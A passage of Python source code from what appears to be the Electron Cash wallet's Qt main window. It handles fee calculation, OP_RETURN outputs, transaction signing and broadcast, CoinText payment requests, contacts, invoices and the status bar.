self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
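# round(fee_rate*100)/100 rounds the displayed rate to two decimal places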
return str(round(fee_rate*100)/100) + " sats/B"
@staticmethod
def output_for_opreturn_stringdata(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
op_return_code = "OP_RETURN "
op_return_encoded = op_return.encode('utf-8')
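# 220 bytes of data leaves room for the OP_RETURN opcode and push prefix within the
# (typical) 223-byte standard relay limit on the whole script; compare the 223-byte
# check in output_for_opreturn_rawhex below.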
if len(op_return_encoded) > 220:
raise OPReturnTooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
op_return_payload = op_return_encoded.hex()
script = op_return_code + op_return_payload
amount = 0
return (TYPE_SCRIPT, ScriptOutput.from_string(script), amount)
@staticmethod
def output_for_opreturn_rawhex(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
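# 'empty' is the sentinel used by pay_to_URI() for a blank op_return_raw URI parameter;
# it maps to a bare OP_RETURN script with no data.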
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturnError(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturnTooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput(op_return_script), amount)
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
fee_rate = None
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if not outputs:
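# No recipient entered yet: use a dummy address so a transaction can still be built for fee estimation.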
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
outputs.append(self.output_for_opreturn_rawhex(opreturn_message))
else:
outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
self.op_return_toolong = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except OPReturnTooLarge:
self.op_return_toolong = True
return
except OPReturnError as e:
self.statusBar().showMessage(str(e))
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.max_button.isChecked():
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is not None:
fee_rate = fee / tx.estimated_size()
self.fee_slider_mogrifier(self.get_custom_fee_text(fee_rate))
def fee_slider_mogrifier(self, text = None):
fee_slider_hidden = self.config.has_custom_fee_rate()
self.fee_slider.setHidden(fee_slider_hidden)
self.fee_custom_lbl.setHidden(not fee_slider_hidden)
if text is not None: self.fee_custom_lbl.setText(text)
def from_list_delete(self, name):
item = self.from_list.currentItem()
if (item and item.data(0, Qt.UserRole) == name
and not item.data(0, Qt.UserRole+1) ):
i = self.from_list.indexOfTopLevelItem(item)
try:
self.pay_from.pop(i)
except IndexError:
# The list may contain items not in the pay_from if added by a
# plugin using the spendable_coin_filter hook
pass
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
if not item:
return
menu = QMenu()
name = item.data(0, Qt.UserRole)
action = menu.addAction(_("Remove"), lambda: self.from_list_delete(name))
if item.data(0, Qt.UserRole+1):
action.setText(_("Not Removable"))
action.setDisabled(True)
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self, *, spendable=None):
''' Optional kwarg spendable indicates *which* of the UTXOs in the
self.pay_from list are actually spendable. If this arg is specified,
coins in the self.pay_from list that aren't also in the 'spendable' list
will be grayed out in the UI, to indicate that they will not be used.
Otherwise all coins will be non-gray (default).
(Added for CashShuffle 02/23/2019) '''
sel = self.from_list.currentItem() and self.from_list.currentItem().data(0, Qt.UserRole)
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def name(x):
return "{}:{}".format(x['prevout_hash'], x['prevout_n'])
def format(x):
h = x['prevout_hash']
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
x['prevout_n'], x['address'])
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
def new(item, is_unremovable=False):
ret = QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])
ret.setData(0, Qt.UserRole, name(item))
ret.setData(0, Qt.UserRole+1, is_unremovable)
return ret
for item in self.pay_from:
twi = new(item)
if spendable is not None and item not in spendable:
grayify(twi)
self.from_list.addTopLevelItem(twi)
if name(item) == sel:
self.from_list.setCurrentItem(twi)
if spendable is not None: # spendable may be None if no plugin filtered coins.
for item in spendable:
# append items added by the plugin to the spendable list
# at the bottom. These coins are marked as "not removable"
# in the UI (the plugin basically insisted these coins must
# be spent with the other coins in the list for privacy).
if item not in self.pay_from:
twi = new(item, True)
self.from_list.addTopLevelItem(twi)
if name(item) == sel:
self.from_list.setCurrentItem(twi)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
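# Note: 'protected' is defined in the class body and applied as a plain decorator
# (e.g. @protected on sign_tx below); it wraps methods so that they receive the wallet
# password via the 'password' keyword argument.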
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
on_pw_cancel = kwargs.pop('on_pw_cancel', None)
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
if callable(on_pw_cancel):
on_pw_cancel()
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
isInvoice = False
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
isInvoice = True
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
try:
# handle op_return if specified and enabled
opreturn_message = self.message_opreturn_e.text()
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
outputs.append(self.output_for_opreturn_rawhex(opreturn_message))
else:
outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins(isInvoice)
return outputs, fee, label, coins
_cointext_popup_kill_tab_changed_connection = None
def do_cointext(self):
''' This is called by the cointext button 'clicked' signal and it
initiates the processing of the cointext URL. This should only be
called if self.payto_e.cointext is not None, otherwise it will do
nothing. '''
if self.payto_e.cointext and not self.payment_request:
if self.gui_object.warn_if_no_network(self):
return
phone = self.payto_e.cointext
sats = self.amount_e.get_amount()
if sats:
url = "https://pay.cointext.io/p/{}/{}".format(phone, sats)
def get_cointext_pr():
# Runs in thread
self.print_error("CoinText URL", url)
pr = paymentrequest.get_payment_request(url) # raises on error
return pr
def on_success(pr):
# Runs in main thread
if pr:
if pr.error:
self.print_error("CoinText ERROR", pr.error)
self.show_error(_("There was an error processing the CoinText. Please check the phone number and try again."))
return
self.print_error("CoinText RESULT", repr(pr))
self.prepare_for_payment_request()
def show_popup():
if not self.send_button.isVisible():
# likely a watching-only wallet, in which case
# showing the popup label for the send button
# leads to unspecified position for the button
return
show_it = partial(
ShowPopupLabel,
text=_("Please review payment before sending CoinText"),
target=self.send_button, timeout=15000.0,
name="CoinTextPopup",
pointer_position=PopupWidget.LeftSide,
activation_hides=True, track_target=True,
dark_mode = ColorScheme.dark_scheme
)
if not self._cointext_popup_kill_tab_changed_connection:
# this ensures that if the user changes tabs, the popup dies
# ... it is only connected once per instance lifetime
self._cointext_popup_kill_tab_changed_connection = self.tabs.currentChanged.connect(lambda: KillPopupLabel("CoinTextPopup"))
QTimer.singleShot(0, show_it)
pr.request_ok_callback = show_popup
self.on_pr(pr)
def on_error(exc):
self.print_error("CoinText EXCEPTION", repr(exc))
self.on_error(exc)
WaitingDialog(self.top_level_window(),
_("Retrieving CoinText info, please wait ..."),
get_cointext_pr, on_success, on_error)
else:
self.show_error(_('CoinText: Please specify an amount'))
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
#self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
#return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
# IN THE FUTURE IF WE WANT TO APPEND SOMETHING IN THE MSG ABOUT THE FEE, CODE IS COMMENTED OUT:
#if fee > confirm_rate * tx.estimated_size() / 1000:
# msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
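# fee is in satoshis and estimated_size() is in bytes, so this warns when the rate is below 1.0 sat/B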
if (fee < (tx.estimated_size())):
msg.append(_('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm."))
tx.ephemeral['warned_low_fee_already'] = True
if self.config.get('enable_opreturn') and self.message_opreturn_e.text():
msg.append(_("You are using an OP_RETURN message. This gets permanently written to the blockchain."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx, tx_desc)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
if pr:
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
msg = ack_msg
if ack_status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
status = True
else:
status, msg = self.network.broadcast_transaction(tx)
return status, msg
# Check fee and warn if it's below 1.0 sats/B (and not warned already)
fee = None
try: fee = tx.get_fee()
except: pass # no fee info available for tx
# Check fee >= size otherwise warn. FIXME: If someday network relay
# rules change to be other than 1.0 sats/B minimum, this code needs
# to be changed.
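# len(str(tx))//2 is the transaction size in bytes (str(tx) is the hex serialization),
# so fee < size means a rate under 1.0 sats/B.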
if (isinstance(fee, int) and tx.is_complete() and fee < len(str(tx))//2
and not tx.ephemeral.get('warned_low_fee_already')):
msg = _('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm.") + "\n\n" + _("Proceed?")
if not self.question(msg, title = _("Low Fee")):
return
# /end fee check
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
if self.gui_object.warn_if_no_network(self):
# Don't allow a useless broadcast when in offline mode. Previous to this we were getting an exception on broadcast.
return
elif not self.network.is_connected():
# Don't allow a potentially very slow broadcast when obviously not connected.
parent.show_error(_("Not connected"))
return
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
buttons, copy_index, copy_link = [ _('Ok') ], None, ''
try: txid = tx.txid() # returns None if not is_complete, but may raise potentially as well
except: txid = None
if txid is not None:
if tx_desc is not None:
self.wallet.set_label(txid, tx_desc)
copy_link = web.BE_URL(self.config, 'tx', txid)
if copy_link:
# tx is complete and there is a copy_link
buttons.insert(0, _("Copy link"))
copy_index = 0
if parent.show_message(_('Payment sent.') + '\n' + msg,
buttons = buttons,
defaultButton = buttons[-1],
escapeButton = buttons[-1]) == copy_index:
# There WAS a 'Copy link' and they clicked it
self.copy_to_clipboard(copy_link, _("Block explorer link copied to clipboard"), self.top_level_window())
self.invoice_list.update()
self.do_clear()
else:
if msg.startswith("error: "):
msg = msg.split(" ", 1)[-1] # take the last part, sans the "error: " prefix
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
result = dialog.exec_()
dialog.setParent(None)
if not result:
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.cointext = None
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
# New! Payment requests have an optional (may not be there!) attribute
# 'request_ok_callback' which takes 0 args and is called on request ok
# This facility was needed to do the CoinTextPopup label properly.
cb = getattr(self.payment_request, 'request_ok_callback', None)
if callable(cb):
cb()
def payment_request_error(self):
request_error = self.payment_request and self.payment_request.error
self.payment_request = None
self.print_error("PaymentRequest error:", request_error)
self.show_error(_("There was an error processing the payment request"), rich_text=False)
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr)
except Exception as e:
self.show_error(_('Invalid bitcoincash URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
op_return = out.get('op_return')
op_return_raw = out.get('op_return_raw')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
if op_return:
self.message_opreturn_e.setText(op_return)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(False)
self.opreturn_label.setHidden(False)
elif op_return_raw is not None:
# 'is not None' allows blank value.
# op_return_raw is secondary precedence to op_return
if not op_return_raw:
op_return_raw='empty'
self.message_opreturn_e.setText(op_return_raw)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(True)
self.opreturn_label.setHidden(False)
elif not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText('')
self.message_opreturn_e.setHidden(True)
self.opreturn_rawhex_cb.setHidden(True)
self.opreturn_label.setHidden(True)
def do_clear(self):
''' Clears the send tab, resetting its UI state to its initial state. '''
KillPopupLabel("CoinTextPopup") # just in case it was alive
self.max_button.setChecked(False)
self.not_enough_funds = False
self.op_return_toolong = False
self.payment_request = None
self.payto_e.cointext = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.message_opreturn_e]:
e.setText('')
e.setFrozen(False)
self.max_button.setDisabled(False)
self.opreturn_rawhex_cb.setChecked(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.message_opreturn_e.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_rawhex_cb.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_label.setVisible(self.config.get('enable_opreturn', False))
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_converter_tab(self):
source_address = QLineEdit()
cash_address = ButtonsLineEdit()
cash_address.addCopyButton()
cash_address.setReadOnly(True)
legacy_address = ButtonsLineEdit()
legacy_address.addCopyButton()
legacy_address.setReadOnly(True)
widgets = [
(cash_address, Address.FMT_CASHADDR),
(legacy_address, Address.FMT_LEGACY),
]
def convert_address():
try:
addr = Address.from_string(source_address.text().strip())
except:
addr = None
for widget, fmt in widgets:
if addr:
widget.setText(addr.to_full_string(fmt))
else:
widget.setText('')
source_address.textChanged.connect(convert_address)
w = QWidget()
grid = QGridLayout()
grid.setSpacing(15)
grid.setColumnStretch(1, 2)
grid.setColumnStretch(2, 1)
label = QLabel(_('&Address to convert'))
label.setBuddy(source_address)
grid.addWidget(label, 0, 0)
grid.addWidget(source_address, 0, 1)
label = QLabel(_('&Cash address'))
label.setBuddy(cash_address)
grid.addWidget(label, 1, 0)
grid.addWidget(cash_address, 1, 1)
label = QLabel(_('&Legacy address'))
label.setBuddy(legacy_address)
grid.addWidget(label, 2, 0)
grid.addWidget(legacy_address, 2, 1)
w.setLayout(grid)
label = WWLabel(_(
"This tool helps convert between address formats for Bitcoin "
"Cash addresses.\nYou are encouraged to use the 'Cash address' "
"format."
))
vbox = QVBoxLayout()
vbox.addWidget(label)
vbox.addWidget(w)
vbox.addStretch(1)
w = QWidget()
w.setLayout(vbox)
return w
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
self.gui_object.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
self.gui_object.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
self.gui_object.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_ui_string()))):
self.wallet.delete_address(addr)
self.update_tabs()
self.update_status()
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
coins = []
if self.pay_from:
coins = self.pay_from.copy()
else:
coins = self.wallet.get_spendable_coins(None, self.config, isInvoice)
run_hook("spendable_coin_filter", self, coins) # may modify coins -- used by CashShuffle if in shuffle = ENABLED mode.
if self.pay_from:
# coins may have been filtered, so indicate this in the UI
self.redraw_from_list(spendable=coins)
return coins
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
run_hook('on_spend_coins', self, coins) # CashShuffle: will set the mode of send tab to coins[0]'s shuffled/unshuffled state
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.do_clear()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not Address.is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
old_entry = self.contacts.get(address, None)
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.update_completions()
# The contact has changed, update any addresses that are displayed with the old information.
run_hook('update_contact', address, self.contacts[address], old_entry)
return True
def delete_contacts(self, addresses):
contact_str = " + ".join(addresses) if len(addresses) <= 3 else _("{} contacts").format(len(addresses))
if not self.question(_("Remove {} from your list of contacts?")
.format(contact_str)):
return
removed_entries = []
for address in addresses:
if address in self.contacts.keys():
removed_entries.append((address, self.contacts[address]))
self.contacts.pop(address)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.contact_list.update()
self.update_completions()
run_hook('delete_contacts', removed_entries)
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self.top_level_window(), _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1].to_ui_string(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
weakD = Weak.ref(d)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.invoice_list.update()
d = weakD()
if d: d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
d.setParent(None) # So Python can GC
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console(wallet=self.wallet)
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
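# Wrap callbacks in Weak references, presumably so the console's command namespace does not
# hold strong references that would keep this window alive after it is closed.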
set_json = Weak(self.console.set_json)
c = commands.Commands(self.config, self.wallet, self.network, lambda: set_json(True))
methods = {}
password_getter = Weak(self.password_dialog)
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=password_getter,
**kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_available_button = StatusBarButton(QIcon(":icons/electron-cash-update.svg"), _("Update available, click for details"), lambda: self.gui_object.show_update_checker(self, skip_check=True))
self.update_available_button.setStatusTip(_("An Electron Cash update is available"))
sb.addPermanentWidget(self.update_available_button)
self.update_available_button.setVisible(bool(self.gui_object.new_version_available)) # if hidden now gets unhidden by on_update_available when a new version comes in
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
self.cashshuffle_status_button = StatusBarButton(
self.cashshuffle_icon(),
'', # ToolTip will be set in update_cashshuffle code
self.cashshuffle_icon_leftclick
)
self.cashshuffle_toggle_action = QAction("", self.cashshuffle_status_button) # action text will get set in update_cashshuffle_icon()
self.cashshuffle_toggle_action.triggered.connect(self.toggle_cashshuffle)
self.cashshuffle_settings_action = QAction("", self.cashshuffle_status_button)
self.cashshuffle_settings_action.triggered.connect(self.show_cashshuffle_settings)
self.cashshuffle_viewpools_action = QAction(_("View pools..."), self.cashshuffle_status_button)
self.cashshuffle_viewpools_action.triggered.connect(self.show_cashshuffle_pools)
self.cashshuffle_status_button.addAction(self.cashshuffle_viewpools_action)
self.cashshuffle_status_button.addAction(self.cashshuffle_settings_action)
self.cashshuffle_separator_action = sep = QAction(self.cashshuffle_status_button); sep.setSeparator(True)
self.cashshuffle_status_button.addAction(sep)
self.cashshuffle_status_button.addAction(self.cashshuffle_toggle_action)
self.cashshuffle_status_button.setContextMenuPolicy(Qt.ActionsContextMenu)
sb.addPermanentWidget(self.cashshuffle_status_button)
self.addr_converter_button = StatusBarButton(
self.cashaddr_icon(),
_("Toggle CashAddr Display"),
self.toggle_cashaddr_status_bar
)
self.update_cashaddr_icon()
sb.addPermanentWidget(self.addr_converter_button)
self.addr_converter_button.setHidden(self.gui_object.is_cashaddr_status_button_hidden())
self.gui_object.cashaddr_status_button_hidden_signal.connect(self.addr_converter_button.setHidden)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.svg"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
weakSelf = Weak.ref(self)
gui_object = self.gui_object
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.svg"), _("Network"), lambda: gui_object.show_network_dialog(weakSelf()))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def on_update_available(self, b):
self.update_available_button.setVisible(bool(b))
# The popup label won't really be shown unless this window is
# on top.. but regardless we give each label a unique internal name
# so they don't interfere with each other.
lblName = "UpdateAvailable_" + self.diagnostic_name()
if b:
ShowPopupLabel(name = lblName,
